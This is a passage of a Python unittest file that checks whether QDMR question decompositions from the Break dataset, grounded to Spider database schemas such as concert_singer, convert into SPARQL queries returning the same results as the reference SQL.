["Theme", "#1"],
["#1", "#2"],
["#3", "#3", "in 2014"],
["#3", "#4", "#4"]
])
grounding = { GroundingIndex(0,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(3,2,"in 2014") : GroundingKey.make_comparative_grounding("=", "2014", GroundingKey.make_column_grounding("concert", "Year")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSqlWithStar(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_sql_with_star(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
sql_query = "SELECT * FROM concert join stadium on concert.stadium_id = stadium.Stadium_ID"
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert ?concert_Name ?Theme ?Stadium_ID ?Year ?stadium ?Location ?Name ?Capacity ?Highest ?Lowest ?Average
WHERE
{
?concert arc:concert:concert_ID ?concert.
?concert arc:concert:concert_Name ?concert_Name.
?concert arc:concert:Theme ?Theme.
?concert arc:concert:Stadium_ID ?Stadium_ID.
?concert arc:concert:Year ?Year.
?Stadium_ID arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium.
?stadium arc:stadium:Stadium_ID ?stadium.
?stadium arc:stadium:Location ?Location.
?stadium arc:stadium:Name ?Name.
?stadium arc:stadium:Capacity ?Capacity.
?stadium arc:stadium:Highest ?Highest.
?stadium arc:stadium:Lowest ?Lowest.
?stadium arc:stadium:Average ?Average.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Theme")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Stadium_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Year")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Stadium_ID")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Location")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Capacity")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Highest")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Lowest")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Average")),
])
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
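# break_program: SELECT the concert table, PROJECT each of the remaining 11 output
# columns from #1, then UNION all twelve steps to emulate SELECT * over the join.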
qdmr = QdmrInstance(["select"] + ["project"] * 11 + ["union"],
[["concert"],
["concert_Name", "#1"],
["Theme", "#1"],
["Stadium_ID", "#1"],
["Year", "#1"],
["Stadium_ID", "#1"],
["Location", "#1"],
["Name", "#1"],
["Capacity", "#1"],
["Highest", "#1"],
["Lowest", "#1"],
["Average", "#1"],
["#1", "#2", "#3", "#4", "#5", "#6", "#7", "#8", "#9", "#10", "#11", "#12"],
])
grounding = { GroundingIndex(0,0,"concert") : GroundingKey.make_table_grounding("concert"),
GroundingIndex(1,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(2,0,"Theme") : GroundingKey.make_column_grounding("concert", "Theme"),
GroundingIndex(3,0,"Stadium_ID") : GroundingKey.make_column_grounding("concert", "Stadium_ID"),
GroundingIndex(4,0,"Year") : GroundingKey.make_column_grounding("concert", "Year"),
GroundingIndex(5,0,"Stadium_ID") : GroundingKey.make_table_grounding("stadium"),
GroundingIndex(6,0,"Location") : GroundingKey.make_column_grounding("stadium", "Location"),
GroundingIndex(7,0,"Name") : GroundingKey.make_column_grounding("stadium", "Name"),
GroundingIndex(8,0,"Capacity") : GroundingKey.make_column_grounding("stadium", "Capacity"),
GroundingIndex(9,0,"Highest") : GroundingKey.make_column_grounding("stadium", "Highest"),
GroundingIndex(10,0,"Lowest") : GroundingKey.make_column_grounding("stadium", "Lowest"),
GroundingIndex(11,0,"Average") : GroundingKey.make_column_grounding("stadium", "Average"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSqlWithNonUniqueArgmax(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_sql_non_unique_argmax(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
sql_query = "SELECT concert_Name, year FROM concert ORDER BY year DESC LIMIT 1 "
correct_sparql_query = textwrap.dedent("""\
SELECT ?concert_Name ?Year1
WHERE
{
{
SELECT (max(?Year) as ?max)
{
?c_id arc:concert:Year ?Year.
}
}
?c_id arc:concert:Year ?Year1.
FILTER(?Year1 = ?max).
?c_id arc:concert:concert_Name ?concert_Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "concert_Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("concert", "Year"))])
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
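# weak_mode_argmax relaxes the comparison: SQL's ORDER BY ... DESC LIMIT 1 returns one
# arbitrary row among ties on Year, whereas the SPARQL query returns every argmax row.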
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
weak_mode_argmax=True,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_sql_non_unique_argmax_no_max_in_output(self):
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
sql_query = "SELECT concert_Name FROM concert ORDER BY year DESC LIMIT 1 "
qdmr = QdmrInstance(["select", "project", "superlative"],
[["concert_Name"],
["Year", "#1"],
["max", "#1", "#2"],
])
grounding = { GroundingIndex(0,0,"concert_Name") : GroundingKey.make_column_grounding("concert", "concert_Name"),
GroundingIndex(1,0,"Year") : GroundingKey.make_column_grounding("concert", "Year"),
GroundingIndex(2,0,"max") : GroundingKey.make_comparative_grounding("max", None),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
weak_mode_argmax=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderWeirdTypes(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_train(self):
"""Test an entry from spider dataset
"""
split_name = "train"
db_id = "bike_1"
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = "SELECT id, zip_code FROM trip where id = 900630 order by zip_code"
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?trip ?zip_code
WHERE
{
?trip arc:trip:zip_code ?zip_code.
FILTER(?trip = key:trip:id:0000000000900630).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("trip", "id")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("trip", "zip_code"))])
# break_program:
qdmr = QdmrInstance(["select", "project", "union", "comparative", "sort"],
[["trip_id"],
["zip_code", "#1"],
["#1", "#2"],
["#3", "#2", "= 900630"],
["#4", "#2"]
])
grounding = {}
grounding[GroundingIndex(0,0,"trip_id")] = GroundingKey.make_table_grounding("trip")
grounding[GroundingIndex(1,0,"zip_code")] = GroundingKey.make_column_grounding("trip", "zip_code")
grounding[GroundingIndex(3,2,"= 900630")] = GroundingKey.make_comparative_grounding("=", "900630", GroundingKey.make_column_grounding("trip", "id"))
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev0(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 0
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT (COUNT(?singer) AS ?count)
WHERE
{
?singer arc:singer:Singer_ID ?singer.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program = ["SELECT['singers']", "AGGREGATE['count', '#1']"]
grounding = {GroundingIndex(0,0,"singers") : GroundingKey.make_table_grounding("singer")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev2(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 2
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
qdmr = get_qdmr_from_break(split_name, i_query)
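# patch the SORT step so that it sorts #5 by the ages (#4), as listed in the program below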
qdmr.args[-1] = ["#5", "#4", "from oldest to youngest"]
# break_program = [
# "SELECT['singers']",
# "PROJECT['names of #REF', '#1']",
# "PROJECT['countries of #REF', '#1']",
# "PROJECT['ages of #REF', '#1']",
# "UNION['#2', '#3', '#4']",
# "SORT['#5', '#4', 'from oldest to youngest']"]
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,0,"names of #REF")] = GroundingKey.make_column_grounding("singer", "Name")
grounding[GroundingIndex(2,0,"countries of #REF")] = GroundingKey.make_column_grounding("singer", "Country")
grounding[GroundingIndex(3,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
grounding[GroundingIndex(5,2,"from oldest to youngest")] = GroundingKey.make_sortdir_grounding(ascending=False)
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=True,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev5(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 5
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT (avg(?Age) as ?avg) (min(?Age) as ?min) (max(?Age) as ?max)
WHERE
{
?singer arc:singer:Age ?Age.
?singer arc:singer:Country ?Country.
FILTER(?Country = "France"^^xsd:string).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program =
# ["SELECT['singers']",
# "FILTER['#1', 'who are French']",
# "PROJECT['ages of #REF', '#2']",
# "AGGREGATE['avg', '#3']",
# "AGGREGATE['min', '#3']",
# "AGGREGATE['max', '#3']",
# "UNION['#4', '#5', '#6']"]
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,1,"who are French")] = GroundingKey.make_value_grounding("singer", "Country", "France")
grounding[GroundingIndex(2,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev8(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_no_distinct(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 8
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
correct_sparql_query = textwrap.dedent("""\
SELECT ?Country
WHERE
{
?singer arc:singer:Age ?Age.
FILTER(?Age > 20.0).
?singer arc:singer:Country ?Country.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['singers']
# PROJECT['ages of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is higher than 20']
# PROJECT['distinct countries #REF are from', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
grounding[GroundingIndex(2,2,"is higher than 20")] = GroundingKey.make_comparative_grounding(">", "20")
grounding[GroundingIndex(3,0,"distinct countries #REF are from")] = GroundingKey.make_column_grounding("singer", "Country")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 8
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?Country
WHERE
{
?singer arc:singer:Age ?Age.
FILTER(?Age > 20.0).
?singer arc:singer:Country ?Country.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['singers']
# PROJECT['ages of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is higher than 20']
# PROJECT['distinct countries #REF are from', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"singers")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(1,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
grounding[GroundingIndex(2,2,"is higher than 20")] = GroundingKey.make_comparative_grounding(">", "20")
grounding[GroundingIndex(3,0,"distinct countries #REF are from")] = GroundingKey.make_column_grounding("singer", "Country")
grounding["distinct"] = ["#4"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev10(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 10
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT ?country (COUNT(?singer) AS ?count)
WHERE
{
?singer arc:singer:Country ?country
}
GROUP BY ?country
""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# PROJECT['singers in #REF', '#1']
# GROUP['count', '#2', '#1']
# UNION['#1', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_column_grounding("singer", "Country")
grounding[GroundingIndex(1,0,"singers in #REF")] = GroundingKey.make_table_grounding("singer")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev11(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 11
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT ?country (COUNT(?singer) AS ?count)
WHERE
{
?singer arc:singer:Country ?country
}
GROUP BY ?country
""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# PROJECT['singers from #REF', '#1']
# GROUP['count', '#2', '#1']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_column_grounding("singer", "Country")
grounding[GroundingIndex(1,0,"singers from #REF")] = GroundingKey.make_table_grounding("singer")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev14(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 14
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# this query gives empty results, which makes it bad for testing
# all the capacities: ('4125',), ('2000',), ('10104',), ('4000',), ('3808',), ('3100',), ('3960',), ('11998',), ('52500',)
# switching 5000 in the query to 3100
correct_sparql_query = textwrap.dedent("""\
SELECT ?Location ?Name
WHERE
{
?stadium arc:stadium:Capacity ?Capacity.
FILTER(?Capacity >= 3100.0).
FILTER(?Capacity <= 10000.0).
?stadium arc:stadium:Location ?Location.
?stadium arc:stadium:Name ?Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Location")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("stadium", "Name"))])
qdmr = get_qdmr_from_break(split_name, i_query)
qdmr.args[2] = ["#1", "#2", "is at least 3100"]
# break_program:
# SELECT['stadiums']
# PROJECT['capacities of #REF', '#1']
# COMPARATIVE['#1', '#2', 'is at least 3100'] # the original version - 'is at least 5000' - leads to an empty result
# COMPARATIVE['#1', '#2', 'is at most 10000']
# INTERSECTION['#1', '#3', '#4']
# PROJECT['locations of #REF', '#5']
# PROJECT['names of #REF', '#5']
# UNION['#6', '#7']
grounding = {}
grounding[GroundingIndex(0,0,"stadiums")] = GroundingKey.make_table_grounding("stadium")
grounding[GroundingIndex(1,0,"capacities of #REF")] = GroundingKey.make_column_grounding("stadium", "Capacity")
grounding[GroundingIndex(2,2,"is at least 3100")] = GroundingKey.make_comparative_grounding(">=", "3100")
grounding[GroundingIndex(3,2,"is at most 10000")] = GroundingKey.make_comparative_grounding("<=", "10000")
grounding[GroundingIndex(5,0,"locations of #REF")] = GroundingKey.make_column_grounding("stadium", "Location")
grounding[GroundingIndex(6,0,"names of #REF")] = GroundingKey.make_column_grounding("stadium", "Name")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev20(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 20
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# CAUTION: this is not a great test because it selects all the concerts
correct_sparql_query = textwrap.dedent("""\
SELECT (COUNT(?concerts) AS ?count)
WHERE
{
{
?concerts arc:concert:Year ?year.
FILTER(?year = 2014).
}
UNION
{
?concerts arc:concert:Year ?year
FILTER(?year = 2015)
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_table_grounding("concert"), schema), "count")])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['concerts']
# FILTER['#1', 'in 2014']
# FILTER['#1', 'in 2015']
# UNION['#2', '#3']
# AGGREGATE['count', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"concerts")] = GroundingKey.make_table_grounding("concert")
grounding[GroundingIndex(1,1,"in 2014")] = GroundingKey.make_value_grounding("concert", "Year", "2014")
grounding[GroundingIndex(2,1,"in 2015")] = GroundingKey.make_value_grounding("concert", "Year", "2015")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev24(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 24
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Show the stadium name and capacity with most number of concerts in year 2014 or after.
# SQL: SELECT T2.name , T2.capacity FROM concert AS T1 JOIN stadium AS T2 ON T1.stadium_id = T2.stadium_id WHERE T1.year >= 2014 GROUP BY T2.stadium_id ORDER BY count(*) DESC LIMIT 1
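# The reference SPARQL below counts, per stadium, the concerts with Year >= 2014, takes the
# maximum of these counts, and returns the name and capacity of the stadium(s) attaining it.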
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?Capacity
WHERE
{
{
SELECT DISTINCT ?stadium_3
WHERE
{
{
SELECT (max(?count) AS ?max)
WHERE
{
{
SELECT ?stadium_1 (count(?concert) AS ?count)
WHERE
{
{
SELECT DISTINCT ?concert
WHERE
{
?Stadium_ID arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium.
?concert arc:concert:Stadium_ID ?Stadium_ID.
?concert arc:concert:Year ?Year.
FILTER(?Year >= 2014).
}
}
?concert arc:concert:Stadium_ID ?Stadium_ID_1.
?Stadium_ID_1 arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium_1.
?stadium_1 arc:stadium:Stadium_ID ?stadium_1.
}
GROUP BY ?stadium_1
}
}
}
{
SELECT ?stadium_3 (count(?concert_1) AS ?count_1)
WHERE
{
{
SELECT DISTINCT ?concert_1
WHERE
{
?Stadium_ID_1 arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium_2.
?concert_1 arc:concert:Stadium_ID ?Stadium_ID_1.
?concert_1 arc:concert:Year ?Year_1.
FILTER(?Year_1 >= 2014).
}
}
?concert_1 arc:concert:Stadium_ID ?Stadium_ID_3.
?Stadium_ID_3 arc:concert:Stadium_ID:stadium:Stadium_ID ?stadium_3.
?stadium_3 arc:stadium:Stadium_ID ?stadium_3.
}
GROUP BY ?stadium_3
}
FILTER(?count_1 = ?max).
}
}
?stadium_3 arc:stadium:Name ?Name.
?stadium_3 arc:stadium:Capacity ?Capacity.
}""")
# qdmr = get_qdmr_from_break(split_name, i_query)
qdmr = QdmrInstance(["select", "project", "project", "comparative", "group", "superlative", "project", "project", "union"],
[["tbl:stadium"],
["tbl:concert", "#1"],
["col:concert:Year", "#2"],
["#2", "#3", "comparative:>=:2014:col:concert:Year"],
["count", "#4", "#1"],
["comparative:max:None", "#1", "#5"],
["col:stadium:Name", "#6"],
["col:stadium:Capacity", "#6"],
["#7", "#8"],
])
# break_program:
# 1. SELECT[tbl:stadium]
# 2. PROJECT[tbl:concert, #1]
# 3. PROJECT[col:concert:Year, #2]
# 4. COMPARATIVE[#2, #3, comparative:>=:2014:col:concert:Year]
# 5. GROUP[count, #4, #1]
# 6. SUPERLATIVE[comparative:max:None, #1, #5]
# 7. PROJECT[col:stadium:Name, #6]
# 8. PROJECT[col:stadium:Capacity, #6]
# 9. UNION[#7, #8]
grounding = {}
grounding[GroundingIndex(0,0,"tbl:stadium")] = GroundingKey.make_table_grounding("stadium")
grounding[GroundingIndex(1,0,"tbl:concert")] = GroundingKey.make_table_grounding("concert")
grounding[GroundingIndex(2,0,"col:concert:Year")] = GroundingKey.make_column_grounding("concert", "Year")
grounding[GroundingIndex(3,2,"comparative:>=:2014:col:concert:Year")] = GroundingKey.make_comparative_grounding(">=", "2014", GroundingKey.make_column_grounding("concert", "Year"))
grounding[GroundingIndex(5,0,"comparative:max:None")] = GroundingKey.make_comparative_grounding("max", None)
grounding[GroundingIndex(6,0,"col:stadium:Name")] = GroundingKey.make_column_grounding("stadium", "Name")
grounding[GroundingIndex(7,0,"col:stadium:Capacity")] = GroundingKey.make_column_grounding("stadium", "Capacity")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev30(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 30
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Show countries where a singer above age 40 and a singer below 30 are from .
# SQL: select country from singer where age > 40 intersect select country from singer where age < 30
correct_sparql_query = textwrap.dedent("""\
SELECT ?Country
WHERE
{
{
SELECT ?Country
WHERE
{
?singer arc:singer:Country ?Country.
?singer arc:singer:Age ?Age.
FILTER(?Age > 40).
}
GROUP BY ?Country
}
?singer_1 arc:singer:Country ?Country.
?singer_1 arc:singer:Age ?Age_1.
FILTER(?Age_1 < 30).
}
GROUP BY ?Country""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# PROJECT['singers from #REF', '#1']
# PROJECT['ages of #REF', '#2']
# COMPARATIVE['#1', '#3', 'is above 40']
# COMPARATIVE['#1', '#3', 'is below 30']
# INTERSECTION['#1', '#4', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_column_grounding("singer", "Country")
grounding[GroundingIndex(1,0,"singers from #REF")] = GroundingKey.make_table_grounding("singer")
grounding[GroundingIndex(2,0,"ages of #REF")] = GroundingKey.make_column_grounding("singer", "Age")
grounding[GroundingIndex(3,2,"is above 40")] = GroundingKey.make_comparative_grounding(">", "40")
grounding[GroundingIndex(4,2,"is below 30")] = GroundingKey.make_comparative_grounding("<", "30")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
